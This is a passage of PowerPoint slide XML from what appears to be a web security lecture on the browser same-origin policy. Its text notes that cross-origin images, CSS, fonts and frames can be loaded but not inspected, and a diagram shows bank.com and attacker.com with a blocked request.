              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Browser renders cross-origin images, but enclosing page cannot inspect pixels (ok to check if loaded, size)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>CSS, fonts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Can load and use, but not directly inspect</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Frames</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Can load cross-origin HTML in frames, cannot inspect or modify content</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="70659" name="Rectangle 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F599EF9F-C939-9C40-A9EF-5F8ED093FE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73276" y="2079626"/>
            <a:ext cx="8069263" cy="402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4290" tIns="34290" rIns="34290" bIns="34290" anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="342900" indent="-342900">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent2"/>
              </a:buClr>
              <a:buFont typeface="Monotype Sorts" pitchFamily="2" charset="2"/>
              <a:buChar char="u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296863" indent="-296863">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent2"/>
              </a:buClr>
              <a:buChar char="•"/>
              <a:defRPr kumimoji="1"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•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lvl="1">
              <a:spcBef>
                <a:spcPts val="1713"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzPct val="46000"/>
              <a:buBlip>
                <a:blip r:embed="rId2"/>
              </a:buBlip>
            </a:pPr>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="ko-KR">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:ea typeface="Gulim" panose="020B0600000101010101" pitchFamily="34" charset="-127"/>
              <a:sym typeface="Helvetica Neue Light" panose="02000403000000020004" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="70660" name="Group 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9CC40461-41DF-2E49-8B4B-80C81C4CAA17}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="6932761" y="642594"/>
            <a:ext cx="4757737" cy="1295400"/>
            <a:chOff x="3624534" y="4852194"/>
            <a:chExt cx="5284249" cy="1701006"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="70661" name="Group">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AF562940-84E5-D643-A1B2-76C814DF239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24534" y="4852194"/>
              <a:ext cx="3086796" cy="1650809"/>
              <a:chOff x="0" y="0"/>
              <a:chExt cx="8231454" cy="4402155"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="70675" name="Group">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{850D4880-8544-9C4C-BF4A-0B8FFC6B357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0"/>
                <a:ext cx="8231455" cy="4402156"/>
                <a:chOff x="0" y="0"/>
                <a:chExt cx="8231454" cy="4402155"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="32" name="Rounded Rectangle">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2CBDCDAE-0C0A-444C-8778-EEBD7BC2D4D8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8232870" cy="4402600"/>
                </a:xfrm>
                <a:prstGeom prst="roundRect">
                  <a:avLst>
                    <a:gd name="adj" fmla="val 4020"/>
                  </a:avLst>
                </a:prstGeom>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:ln w="25400" cap="flat">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:prstDash val="solid"/>
                  <a:miter lim="400000"/>
                </a:ln>
                <a:effectLst>
                  <a:outerShdw blurRad="50800" dist="25400" dir="3600000" rotWithShape="0">
                    <a:srgbClr val="000000">
                      <a:alpha val="70000"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </p:spPr>
              <p:txBody>
                <a:bodyPr lIns="19050" tIns="19050" rIns="19050" bIns="19050" anchor="ctr"/>
                <a:lstStyle/>
                <a:p>
                  <a:pPr defTabSz="219075">
                    <a:defRPr sz="4000" b="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  <a:latin typeface="Gill Sans"/>
                      <a:ea typeface="Gill Sans"/>
                      <a:cs typeface="Gill Sans"/>
                      <a:sym typeface="Gill Sans"/>
                    </a:defRPr>
                  </a:pPr>
                  <a:endParaRPr sz="1500"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ea typeface="Gill Sans"/>
                    <a:cs typeface="Gill Sans"/>
                    <a:sym typeface="Gill Sans"/>
                  </a:endParaRPr>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="33" name="Shape">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2BB09DFB-D801-874F-B62C-C5A6B3A5FA09}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="32911" y="22235"/>
                  <a:ext cx="8167047" cy="92832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21600"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="4117"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="2980"/>
                        <a:pt x="52" y="1951"/>
                        <a:pt x="136" y="1206"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="220" y="461"/>
                        <a:pt x="336" y="0"/>
                        <a:pt x="464" y="0"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="21136" y="0"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="21264" y="0"/>
                        <a:pt x="21380" y="461"/>
                        <a:pt x="21464" y="1206"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="21548" y="1951"/>
                        <a:pt x="21600" y="2980"/>
                        <a:pt x="21600" y="4117"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="21600" y="21600"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="21600"/>
                      </a:lnTo>
                      <a:close/>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:solidFill>
                  <a:srgbClr val="DCDEE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lIns="19050" tIns="19050" rIns="19050" bIns="19050" anchor="ctr"/>
                <a:lstStyle/>
                <a:p>
                  <a:pPr defTabSz="219075">
                    <a:defRPr sz="3900" b="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  <a:latin typeface="Gill Sans"/>
                      <a:ea typeface="Gill Sans"/>
                      <a:cs typeface="Gill Sans"/>
                      <a:sym typeface="Gill Sans"/>
                    </a:defRPr>
                  </a:pPr>
                  <a:endParaRPr sz="1463"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ea typeface="Gill Sans"/>
                    <a:cs typeface="Gill Sans"/>
                    <a:sym typeface="Gill Sans"/>
                  </a:endParaRPr>
                </a:p>
              </p:txBody>
            </p:sp>
          </p:grpSp>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="70676" name="Group">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{94CB6902-C13E-0144-BA19-E47C6F98034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38419" y="401318"/>
                <a:ext cx="753132" cy="146620"/>
                <a:chOff x="0" y="0"/>
                <a:chExt cx="753131" cy="146618"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="29" name="Circle">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0809A14C-5893-2148-9453-79669B9F8800}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="603203" y="-1082"/>
                  <a:ext cx="150458" cy="150088"/>
                </a:xfrm>
                <a:prstGeom prst="ellipse">
                  <a:avLst/>
                </a:prstGeom>
                <a:solidFill>
                  <a:srgbClr val="00882B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lIns="19050" tIns="19050" rIns="19050" bIns="19050" anchor="ctr"/>
                <a:lstStyle/>
                <a:p>
                  <a:pPr defTabSz="219075">
                    <a:defRPr sz="4000" b="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  <a:latin typeface="Gill Sans"/>
                      <a:ea typeface="Gill Sans"/>
                      <a:cs typeface="Gill Sans"/>
                      <a:sym typeface="Gill Sans"/>
                    </a:defRPr>
                  </a:pPr>
                  <a:endParaRPr sz="1500"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ea typeface="Gill Sans"/>
                    <a:cs typeface="Gill Sans"/>
                    <a:sym typeface="Gill Sans"/>
                  </a:endParaRPr>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="30" name="Circle">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5A17940F-F249-D24C-A9F7-5C2D87AEA045}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="302287" y="-1082"/>
                  <a:ext cx="150458" cy="150088"/>
                </a:xfrm>
                <a:prstGeom prst="ellipse">
                  <a:avLst/>
                </a:prstGeom>
                <a:solidFill>
                  <a:srgbClr val="F5D328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lIns="19050" tIns="19050" rIns="19050" bIns="19050" anchor="ctr"/>
                <a:lstStyle/>
                <a:p>
                  <a:pPr defTabSz="219075">
                    <a:defRPr sz="4000" b="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  <a:latin typeface="Gill Sans"/>
                      <a:ea typeface="Gill Sans"/>
                      <a:cs typeface="Gill Sans"/>
                      <a:sym typeface="Gill Sans"/>
                    </a:defRPr>
                  </a:pPr>
                  <a:endParaRPr sz="1500"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ea typeface="Gill Sans"/>
                    <a:cs typeface="Gill Sans"/>
                    <a:sym typeface="Gill Sans"/>
                  </a:endParaRPr>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="31" name="Circle">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5F597024-68B1-554E-B90B-DEB1C5C201CF}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="1371" y="-1082"/>
                  <a:ext cx="150458" cy="150088"/>
                </a:xfrm>
                <a:prstGeom prst="ellipse">
                  <a:avLst/>
                </a:prstGeom>
                <a:solidFill>
                  <a:srgbClr val="C82506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lIns="19050" tIns="19050" rIns="19050" bIns="19050" anchor="ctr"/>
                <a:lstStyle/>
                <a:p>
                  <a:pPr defTabSz="219075">
                    <a:defRPr sz="4000" b="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  <a:latin typeface="Gill Sans"/>
                      <a:ea typeface="Gill Sans"/>
                      <a:cs typeface="Gill Sans"/>
                      <a:sym typeface="Gill Sans"/>
                    </a:defRPr>
                  </a:pPr>
                  <a:endParaRPr sz="1500"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ea typeface="Gill Sans"/>
                    <a:cs typeface="Gill Sans"/>
                    <a:sym typeface="Gill Sans"/>
                  </a:endParaRPr>
                </a:p>
              </p:txBody>
            </p:sp>
          </p:grpSp>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="70677" name="Group">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2E25D5AF-6EC5-0D40-A1E2-7B443D7E2CE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233267" y="113534"/>
                <a:ext cx="6588739" cy="703134"/>
                <a:chOff x="0" y="0"/>
                <a:chExt cx="6588738" cy="703132"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="26" name="Rectangle">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{88B96E01-5EC4-5A47-9A0E-6E5A353C175B}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="-1392" y="131055"/>
                  <a:ext cx="6591937" cy="455823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lIns="19050" tIns="19050" rIns="19050" bIns="19050" anchor="ctr"/>
                <a:lstStyle/>
                <a:p>
                  <a:pPr defTabSz="219075">
                    <a:defRPr sz="4000" b="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  <a:latin typeface="Gill Sans"/>
                      <a:ea typeface="Gill Sans"/>
                      <a:cs typeface="Gill Sans"/>
                      <a:sym typeface="Gill Sans"/>
                    </a:defRPr>
                  </a:pPr>
                  <a:endParaRPr sz="1500"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ea typeface="Gill Sans"/>
                    <a:cs typeface="Gill Sans"/>
                    <a:sym typeface="Gill Sans"/>
                  </a:endParaRPr>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="70679" name="Image" descr="Image">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F580D831-003E-634A-9361-37F578B31E5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77302" y="212514"/>
                  <a:ext cx="338019" cy="29715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4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28" name="https://a.com">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1625708B-0B46-2044-8098-364541B6D046}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr txBox="1"/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="120855" y="-2357"/>
                  <a:ext cx="5675082" cy="70597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txBody>
                <a:bodyPr lIns="19050" tIns="19050" rIns="19050" bIns="19050" anchor="ctr"/>
                <a:lstStyle>
                  <a:lvl1pPr algn="l" defTabSz="584200">
                    <a:defRPr sz="1000" b="0">
                      <a:solidFill>
                        <a:srgbClr val="A6AAA9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lvl1pPr>
                </a:lstStyle>
                <a:p>
                  <a:pPr>
                    <a:defRPr/>
                  </a:pPr>
                  <a:r>
                    <a:rPr sz="375">
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                      <a:latin typeface="+mn-lt"/>
                    </a:rPr>
                    <a:t>https://a.com</a:t>
                  </a:r>
                </a:p>
              </p:txBody>
            </p:sp>
          </p:grpSp>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="34" name="Rounded Rectangle">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{777062DD-A1DE-4C4C-8E71-94E2C4204429}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5087973" y="5327475"/>
              <a:ext cx="1451096" cy="881772"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 9803"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent6"/>
            </a:solidFill>
            <a:ln w="12700">
              <a:miter lim="400000"/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr lIns="19050" tIns="19050" rIns="19050" bIns="19050" anchor="ctr"/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200">
                <a:sym typeface="Helvetica Neue Medium"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="35" name="bank.com">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0DD227ED-006B-654A-8D28-601C2749E63D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5151448" y="5796503"/>
              <a:ext cx="1324147" cy="258486"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="12700">
              <a:miter lim="400000"/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr lIns="19050" tIns="19050" rIns="19050" bIns="19050" anchor="ctr"/>
            <a:lstStyle>
              <a:lvl1pPr algn="r" defTabSz="584200">
                <a:defRPr sz="4000" b="0"/>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr sz="1500"/>
                <a:t>bank.com</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="36" name="attacker.com">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{91BC80BF-641C-2D44-94C3-A928A819F413}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4114698" y="4910562"/>
              <a:ext cx="1322385" cy="256402"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
            <a:ln w="12700">
              <a:miter lim="400000"/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr lIns="19050" tIns="19050" rIns="19050" bIns="19050" anchor="ctr"/>
            <a:lstStyle>
              <a:lvl1pPr algn="l" defTabSz="584200">
                <a:defRPr sz="3700" b="0"/>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr sz="1388" dirty="0" err="1"/>
                <a:t>attacker.com</a:t>
              </a:r>
              <a:endParaRPr sz="1388" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="37" name="Group" descr="Group">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DF2A7945-14A2-144F-BF77-3724A3EF698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990167" y="5171133"/>
              <a:ext cx="886879" cy="1061044"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="12700">
              <a:miter lim="400000"/>
            </a:ln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</p:spPr>
        </p:pic>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="70666" name="Group">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C0E01FD2-2135-0142-B589-14E15EA46B4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557049" y="5600257"/>
              <a:ext cx="1293183" cy="651134"/>
              <a:chOff x="0" y="0"/>
              <a:chExt cx="3448486" cy="1736356"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="39" name="Line">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{44884EBA-F52E-F545-8499-D6CF447AE3D8}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="-927" y="867970"/>
                <a:ext cx="3451128" cy="0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  <a:headEnd type="triangle" w="med" len="med"/>
              </a:ln>
              <a:effectLst/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0"/>
              <a:lstStyle/>
              <a:p>
                <a:pPr defTabSz="219075">
                  <a:defRPr sz="4000" b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15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ea typeface="Gill Sans"/>
                  <a:cs typeface="Gill Sans"/>
                  <a:sym typeface="Gill Sans"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="40" name="File-Adobe-Dreamweaver-HTML-01-icon.tiff" descr="File-Adobe-Dreamweaver-HTML-01-icon.tiff">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A0133BE2-A7A1-4041-B11B-D951B3CEC8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89893" y="791"/>
                <a:ext cx="1739669" cy="173435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p:spPr>
          </p:pic>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="70667" name="Group">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{36557752-0843-0A4B-969E-3C50DC38169C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm rot="-3925073">
              <a:off x="4432498" y="5552646"/>
              <a:ext cx="821319" cy="690602"/>
              <a:chOff x="-75924" y="-23609"/>
              <a:chExt cx="2190183" cy="1841606"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="42" name="Line">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E4F246B6-D712-644D-B8EB-E6D04EFA7F14}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm rot="2285186">
                <a:off x="-75924" y="862276"/>
                <a:ext cx="2190183" cy="50309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0608" extrusionOk="0">
                    <a:moveTo>
                      <a:pt x="0" y="20608"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="3262" y="13319"/>
                      <a:pt x="6511" y="7616"/>
                      <a:pt x="9769" y="4135"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="13640" y="-1"/>
                      <a:pt x="17551" y="-992"/>
                      <a:pt x="21600" y="971"/>
                    </a:cubicBezTo>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="50800" cap="flat">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:prstDash val="solid"/>
                <a:miter lim="400000"/>
                <a:tailEnd type="stealth" w="med" len="med"/>
              </a:ln>
              <a:effectLst/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0"/>
              <a:lstStyle/>
              <a:p>
                <a:pPr defTabSz="219075">
                  <a:defRPr sz="4000" b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15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ea typeface="Gill Sans"/>
                  <a:cs typeface="Gill Sans"/>
                  <a:sym typeface="Gill Sans"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="43" name="✗">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{00D0EE50-7C36-F442-B5BD-2E196E262011}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm rot="1255569">
                <a:off x="343201" y="-23609"/>
                <a:ext cx="1161796" cy="184160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lIns="19050" tIns="19050" rIns="19050" bIns="19050" anchor="ctr"/>
              <a:lstStyle>
                <a:lvl1pPr defTabSz="584200">
                  <a:defRPr sz="2400">
                    <a:solidFill>
                      <a:schemeClr val="bg2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 defTabSz="584200">
                  <a:defRPr sz="2400">
                    <a:solidFill>
                      <a:schemeClr val="bg2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 defTabSz="584200">
                  <a:defRPr sz="2400">
                    <a:solidFill>
                      <a:schemeClr val="bg2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 defTabSz="584200">
                  <a:defRPr sz="2400">
                    <a:solidFill>
                      <a:schemeClr val="bg2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 defTabSz="584200">
                  <a:defRPr sz="2400">
                    <a:solidFill>
                      <a:schemeClr val="bg2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defTabSz="584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bg2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defTabSz="584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bg2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defTabSz="584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bg2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defTabSz="584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bg2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r>
                  <a:rPr lang="en-US" altLang="en-US" sz="2900" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                    <a:highlight>
                      <a:srgbClr val="FF0000"/>
                    </a:highlight>
                    <a:cs typeface="Gill Sans" panose="020B0502020104020203" pitchFamily="34" charset="-79"/>
                    <a:sym typeface="Gill Sans" panose="020B0502020104020203" pitchFamily="34" charset="-79"/>
                  </a:rPr>
                  <a:t>✗</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="44" name="Line">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{42368538-012C-794C-B190-DB14CF369448}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6556701" y="5527593"/>
              <a:ext cx="1294174" cy="0"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="38100">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:miter lim="400000"/>
              <a:tailEnd type="triangle"/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr defTabSz="219075">
                <a:defRPr sz="4000" b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45" name="attacker.com">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F0F438F1-6F57-B44A-96AE-C34313A770D2}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
